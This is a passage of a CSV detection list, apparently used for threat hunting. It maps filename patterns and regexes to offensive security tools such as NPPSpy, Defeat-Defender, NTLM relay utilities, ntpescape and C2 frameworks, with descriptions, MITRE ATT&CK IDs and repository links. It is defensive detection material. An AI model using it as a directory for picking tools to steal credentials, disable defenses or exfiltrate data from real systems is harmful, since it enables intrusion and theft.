TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/NoPowerShell/*",".{0,1000}\/NoPowerShell\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/norouteconfig.sh*",".{0,1000}\/norouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/noseyparker.git*",".{0,1000}\/noseyparker\.git.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*/NotQuite0DayFriday/zip/trunk*",".{0,1000}\/NotQuite0DayFriday\/zip\/trunk.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/NovaLdr.exe",".{0,1000}\/NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/NovaLdr.git*",".{0,1000}\/NovaLdr\.git.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/NoveLdr.exe",".{0,1000}\/NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/nowsecure/dirtycow*",".{0,1000}\/nowsecure\/dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*/nping-brute.nse*",".{0,1000}\/nping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NPPSPY.dll*",".{0,1000}\/NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/NPPSpy.exe*",".{0,1000}\/NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/nps_payload.git*",".{0,1000}\/nps_payload\.git.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*/nrpe-enum.nse*",".{0,1000}\/nrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nsa-rules.git*",".{0,1000}\/nsa\-rules\.git.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*/NSudo.bat*",".{0,1000}\/NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/NSudoG.exe*",".{0,1000}\/NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/ntapphelpcachecontrol*",".{0,1000}\/ntapphelpcachecontrol.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ntdissector.git*",".{0,1000}\/ntdissector\.git.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/ntdissector/*",".{0,1000}\/ntdissector\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ntdlll-unhooking-collection*",".{0,1000}\/ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*/NTDLLReflection.git*",".{0,1000}\/NTDLLReflection\.git.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*/NtdllUnpatcher.git*",".{0,1000}\/NtdllUnpatcher\.git.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*/ntds_dump_*.txt*",".{0,1000}\/ntds_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ntdsutil.py*",".{0,1000}\/ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/NTHASH-FPC.git*",".{0,1000}\/NTHASH\-FPC\.git.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/ntlm.py*",".{0,1000}\/ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/NTLMInjector.git*",".{0,1000}\/NTLMInjector\.git.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*/NTLMParse.go*",".{0,1000}\/NTLMParse\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ntlmquic*",".{0,1000}\/ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/NTLMRecon*",".{0,1000}\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/NTLMRecon.git*",".{0,1000}\/NTLMRecon\.git.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmrecon/*.py*",".{0,1000}\/ntlmrecon\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/NTLMRelay2Self*",".{0,1000}\/NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*/NtlmRelayToEWS.git*",".{0,1000}\/NtlmRelayToEWS\.git.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/NtlmRelayToEWS/*",".{0,1000}\/NtlmRelayToEWS\/.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/ntlmscan.git*",".{0,1000}\/ntlmscan\.git.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/ntlmscan/*",".{0,1000}\/ntlmscan\/.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/NTLMSleuth.git*",".{0,1000}\/NTLMSleuth\.git.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*/NtlmThief.git*",".{0,1000}\/NtlmThief\.git.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*/ntlmtransport.go*",".{0,1000}\/ntlmtransport\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ntpescape.git*",".{0,1000}\/ntpescape\.git.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*/ntp-info.nse*",".{0,1000}\/ntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ntp-monlist.nse*",".{0,1000}\/ntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NtQuerySystemInformation.md*",".{0,1000}\/NtQuerySystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/NtRemoteLoad.exe*",".{0,1000}\/NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/NtRemoteLoad.git*",".{0,1000}\/NtRemoteLoad\.git.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/NtRights/*",".{0,1000}\/NtRights\/.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/NtSetSystemInformation.md*",".{0,1000}\/NtSetSystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/Nuages_Cli*",".{0,1000}\/Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/nuagesAPI.js*",".{0,1000}\/nuagesAPI\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/nullinux.git*",".{0,1000}\/nullinux\.git.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through 